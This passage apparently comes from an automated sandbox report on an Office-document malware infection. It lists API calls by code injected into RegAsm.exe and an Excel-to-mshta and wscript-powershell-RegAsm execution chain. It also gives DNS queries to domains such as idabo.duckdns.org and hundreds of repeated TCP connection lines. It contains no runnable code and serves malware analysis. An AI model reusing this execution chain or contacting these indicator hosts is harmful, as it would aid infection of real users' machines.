                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,25_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: jfm.com.co
                  Source: global trafficDNS query: name: jfm.com.co
                  Source: global trafficDNS query: name: raw.githubusercontent.com
                  Source: global trafficDNS query: name: jfm.com.co
                  Source: global trafficDNS query: name: idabo.duckdns.org
                  Source: global trafficDNS query: name: idabo.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficDNS query: name: raw.githubusercontent.com
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.199.108.133:443
